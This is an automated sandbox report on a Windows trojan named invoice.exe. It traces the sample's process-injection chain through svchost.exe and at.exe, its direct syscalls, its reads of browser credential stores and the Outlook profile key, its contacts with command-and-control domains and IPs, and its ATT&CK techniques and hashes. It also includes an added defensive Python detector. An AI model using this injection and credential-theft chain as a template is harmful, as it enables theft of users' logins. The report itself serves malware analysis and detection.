Source: C:\Users\user\Desktop\invoice.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\at.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\at.exe  Section loaded: NULL target: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe protection: read write
Source: C:\Windows\SysWOW64\at.exe  Section loaded: NULL target: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\at.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\at.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\at.exe  Thread register set: target process: 5024
Source: C:\Windows\SysWOW64\at.exe  Thread APC queued: target process: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
Source: C:\Users\user\Desktop\invoice.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EA3008
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FD8A73 LogonUserW
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00F83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00F84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FE4CFA mouse_event
Source: C:\Users\user\Desktop\invoice.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice.exe"
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe  Process created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
Source: C:\Windows\SysWOW64\at.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FD81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FE4A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: invoice.exe  Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: invoice.exe, usnnduqerdgHbr.exe, 00000002.00000000.1784686792.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3576005909.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576429437.0000000001180000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
Source: usnnduqerdgHbr.exe, 00000002.00000000.1784686792.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3576005909.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576429437.0000000001180000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
Source: usnnduqerdgHbr.exe, 00000002.00000000.1784686792.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3576005909.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576429437.0000000001180000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
Source: usnnduqerdgHbr.exe, 00000002.00000000.1784686792.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3576005909.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576429437.0000000001180000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FA87AB cpuid
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FB5007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FC215F GetUserNameW
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FB40BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00F84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

Source: Yara match  File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\at.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\at.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\at.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\at.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\at.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\at.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\at.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\at.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\at.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
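The direct-syscall, section-mapping, APC and process-creation lines under HIPS / PFW / Operating System Protection Evasion above and the browser credential-store and Outlook registry accesses just listed describe one chain: invoice.exe starts svchost.exe with its own command line and writes into it, svchost.exe maps an RWX section into usnnduqerdgHbr.exe, usnnduqerdgHbr.exe issues its syscalls directly and starts at.exe, and at.exe opens the Chrome/Edge stores and the Outlook profile key and starts firefox.exe. The following Python is an added example, not part of the report or of Joe Sandbox, that parses behaviour lines in the format used on this page (`Source: <image><event>: <detail>`, with or without the trailing "Jump to behavior" link text), rebuilds the parent/child chain and flags that pattern. The sample log is constructed from a handful of this report's lines; the heuristics (svchost.exe whose parent is not services.exe, at.exe starting a browser, a non-browser process opening Login Data/Cookies/Web Data/Local State, and a process that issues NtWriteVirtualMemory plus NtResumeThread/NtMapViewOfSection/NtCreateUserProcess as direct syscalls) are the example's own choices, not the sandbox's rules.

```python
"""
Parse Joe Sandbox behaviour lines into events, rebuild the process chain and
flag the injection and credential-theft pattern seen in this report.
"""
import re
from collections import defaultdict

EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*"
    r"(?P<event>Process created|Section loaded|Memory written|Thread APC queued|"
    r"Thread register set|File opened|Key opened|Nt\w+): (?P<detail>.*?)(?:Jump to behavior)?$"
)
# Direct syscalls that together form a write-and-run injection (example's own list).
INJECTION_SYSCALLS = {"NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtMapViewOfSection",
                      "NtResumeThread", "NtCreateUserProcess", "NtSetInformationThread"}
BROWSER_STORES = ("login data", "cookies", "web data", "local state", "key4.db", "logins.json")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}


def basename(path):
    return path.rstrip("\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Return (source_image, event, detail) tuples; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m["src"], m["event"], m["detail"].strip()))
    return events


def analyze(events):
    """Return (findings, parents): readable findings and a child->parent image map."""
    findings, parents, direct = [], {}, defaultdict(set)
    for src, event, detail in events:
        s = basename(src)
        if event == "Process created":
            child = basename(detail.split(' "', 1)[0])      # image path precedes the quoted cmdline
            parents[child] = s
            if child == "svchost.exe" and s != "services.exe":
                findings.append(f"svchost.exe started by {s} instead of services.exe")
            if s == "at.exe" and child in BROWSERS:
                findings.append(f"at.exe spawned {child} (browser used as injection host)")
        elif event == "Section loaded" and "execute and read and write" in detail:
            target = basename(detail.split("target: ", 1)[1].split(" protection:", 1)[0])
            findings.append(f"{s} mapped an RWX section into {target}")
        elif event == "Memory written":
            findings.append(f"{s} wrote into the memory of {basename(detail.split(' base:', 1)[0])}")
        elif event == "Thread APC queued":
            findings.append(f"{s} queued an APC in {basename(detail.split('target process: ', 1)[1])}")
        elif event.startswith("Nt"):                         # "Direct from:" syscall records
            direct[s].add(event)
        elif event == "File opened" and s not in BROWSERS and detail.lower().endswith(BROWSER_STORES):
            findings.append(f"{s} opened browser credential store {detail.rsplit(chr(92), 1)[-1]}")
        elif event == "Key opened" and "Windows Messaging Subsystem\\Profiles" in detail:
            findings.append(f"{s} read the Outlook profile key")
    for proc, calls in direct.items():
        used = sorted(calls & INJECTION_SYSCALLS)
        if "NtWriteVirtualMemory" in calls and calls & {"NtResumeThread", "NtMapViewOfSection",
                                                        "NtCreateUserProcess"}:
            findings.append(f"{proc} issued direct syscalls for injection: {', '.join(used)}")
    return findings, parents


def chain(parents, image):
    """Walk child->parent links back to the root, e.g. ['invoice.exe', 'svchost.exe']."""
    path = [image]
    while path[-1] in parents:
        path.append(parents[path[-1]])
    return path[::-1]


# Constructed sample: a subset of this report's lines, in the page's own format.
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice.exe"Jump to behavior
Source: C:\Users\user\Desktop\invoice.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\invoice.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EA3008Jump to behavior
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"Jump to behavior
Source: C:\Windows\SysWOW64\at.exeThread APC queued: target process: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeJump to behavior
Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\at.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
"""

if __name__ == "__main__":
    findings, parents = analyze(parse_events(SAMPLE_LOG))
    for f in findings:
        print("-", f)
    print("chain to firefox.exe:", " -> ".join(chain(parents, "firefox.exe")))
```

The same rules map directly onto endpoint telemetry (Sysmon event 1 for the parent/child checks, event 8/10 for the cross-process access, event 11 or file-access auditing for the credential stores); the report's "Direct from" addresses have no equivalent there, which is exactly why the behavioural pairs above matter more than any single API name.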
Source: invoice.exe  Binary or memory string: WIN_81
Source: invoice.exe  Binary or memory string: WIN_XP
Source: invoice.exe  Binary or memory string: WIN_XPe
Source: invoice.exe  Binary or memory string: WIN_VISTA
Source: invoice.exe  Binary or memory string: WIN_7
Source: invoice.exe  Binary or memory string: WIN_8
Source: invoice.exe  Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

Source: Yara match  File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FF6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\invoice.exe  Code function: 0_2_00FF685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (one line per tactic; techniques followed by a number in parentheses are the ones this report matched, the number being the count shown in the matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (1); Scheduled Task/Job (1); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Scheduled Task/Job (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Scheduled Task/Job (1); Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID: 1510744, sample: invoice.exe, start date: 13/09/2024, architecture: WINDOWS, score: 100)

Sample-level DNS/IP: www.syvra.xyz; www.zhuoyueapp.top; 17 other IPs or domains
Sample-level signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 8 other signatures; Performs DNS queries to domains with low reputation (www.syvra.xyz)

Process chain (a number in parentheses after a process name is the per-process counter from the legend below):
invoice.exe (2), started
    signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    -> svchost.exe, started
        signatures: Maps a DLL or memory area into another process
        -> usnnduqerdgHbr.exe, injected
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> at.exe (13), started
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> usnnduqerdgHbr.exe, injected
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    DNS/IP: easyanalytics.site 162.241.226.190 (ports 50426, 50427, 50428; UNIFIEDLAYER-AS-1US, United States); www.subitoadomicilio.shop 195.24.68.25 (ports 50402, 50403, 50404; RU-CENTERRU, Russian Federation); 7 other IPs or domains
                -> firefox.exe, started



            windows-stand
            SourceDetectionScannerLabelLink
            invoice.exe24%ReversingLabsWin32.Trojan.Leonem
            invoice.exe31%VirustotalBrowse
            invoice.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1510744
                      Start date and time:2024-09-13 12:25:35 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 53s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
Number of new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:invoice.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/3@16/9
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 50
                      • Number of non-executed functions: 273
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
06:27:22  API Interceptor  7537677x Sleep call for process: at.exe modified
                      Process:C:\Windows\SysWOW64\at.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Reputation:high, very likely benign file
                      Process:C:\Users\user\Desktop\invoice.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288768
                      Entropy (8bit):7.9941676568113
                      Encrypted:true
                      SSDEEP:6144:CWKQ+k55PHpPpBfrBZTdaiiiQAgL6wOzhb8DCzYUDLk3O+oblWsZ5uoyLjyD9Efy:0QtVb7TdDBQAEOiDHU23YlW6sjyDuF4
                      MD5:D11E413FD6314147A996756A267A951D
                      SHA1:C1EB1B031F8208096A3DACC773B72777F97A68D1
                      SHA-256:B1AAB16D8830F8457719E7CEECE3F691731039B96391B018AD62ABC1BA17587F
                      SHA-512:98877AA8EDBE6FB76410ECC0B34C56B1B0CB82D475401F33F0037D56926DB3EE7F3705156C021C4A649C31198384B66697D903E636DBF8BEFE69F438DD4D9914
                      Malicious:false
                      Reputation:low
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.261623919132764
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:invoice.exe
                      File size:1'281'536 bytes
                      MD5:8387395792cfc0abb08dc4c23b8ad700
                      SHA1:10da8047d3a56f769b7b70906cfdd3342b6487ef
                      SHA256:6e66e6f4874039caa5e41d1da7b90159c8ada4373c2fd27eb080c3f6d9db5d81
                      SHA512:b8fa060e03a19a3e25019eb5a6a58b95d79b4928f46a469c015a72789ce51aee3c1879deed9a380ed07be5d4aa2b2396d1c5a89ca054aef03415ef863d34643b
                      SSDEEP:24576:/Cdxte/80jYLT3U1jfsWa/uLFfggwC4wvcWnFrAQ:ew80cTsjkWa/uJfg248Fv
                      TLSH:3D55CF2273DDC371CB769173BF6AB7016EBF78614630B85B2F880D79A910161262D7A3
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                      Icon Hash:aaf3e3e3938382a0
                      Entrypoint:0x427f4a
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66E39597 [Fri Sep 13 01:29:59 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:afcdf79be1557326c854b6e20cb900a7
                      Instruction
                      call 00007FDAB46C01ADh
                      jmp 00007FDAB46B2F74h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      push edi
                      push esi
                      mov esi, dword ptr [esp+10h]
                      mov ecx, dword ptr [esp+14h]
                      mov edi, dword ptr [esp+0Ch]
                      mov eax, ecx
                      mov edx, ecx
                      add eax, esi
                      cmp edi, esi
                      jbe 00007FDAB46B30FAh
                      cmp edi, eax
                      jc 00007FDAB46B345Eh
                      bt dword ptr [004C31FCh], 01h
                      jnc 00007FDAB46B30F9h
                      rep movsb
                      jmp 00007FDAB46B340Ch
                      cmp ecx, 00000080h
                      jc 00007FDAB46B32C4h
                      mov eax, edi
                      xor eax, esi
                      test eax, 0000000Fh
                      jne 00007FDAB46B3100h
                      bt dword ptr [004BE324h], 01h
                      jc 00007FDAB46B35D0h
                      bt dword ptr [004C31FCh], 00000000h
                      jnc 00007FDAB46B329Dh
                      test edi, 00000003h
                      jne 00007FDAB46B32AEh
                      test esi, 00000003h
                      jne 00007FDAB46B328Dh
                      bt edi, 02h
                      jnc 00007FDAB46B30FFh
                      mov eax, dword ptr [esi]
                      sub ecx, 04h
                      lea esi, dword ptr [esi+04h]
                      mov dword ptr [edi], eax
                      lea edi, dword ptr [edi+04h]
                      bt edi, 03h
                      jnc 00007FDAB46B3103h
                      movq xmm1, qword ptr [esi]
                      sub ecx, 08h
                      lea esi, dword ptr [esi+08h]
                      movq qword ptr [edi], xmm1
                      lea edi, dword ptr [edi+08h]
                      test esi, 00000007h
                      je 00007FDAB46B3155h
                      bt esi, 03h
                      Programming Language:
                      • [ASM] VS2013 build 21005
                      • [ C ] VS2013 build 21005
                      • [C++] VS2013 build 21005
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [ASM] VS2013 UPD5 build 40629
                      • [RES] VS2013 build 21005
                      • [LNK] VS2013 UPD5 build 40629
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x704bc | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
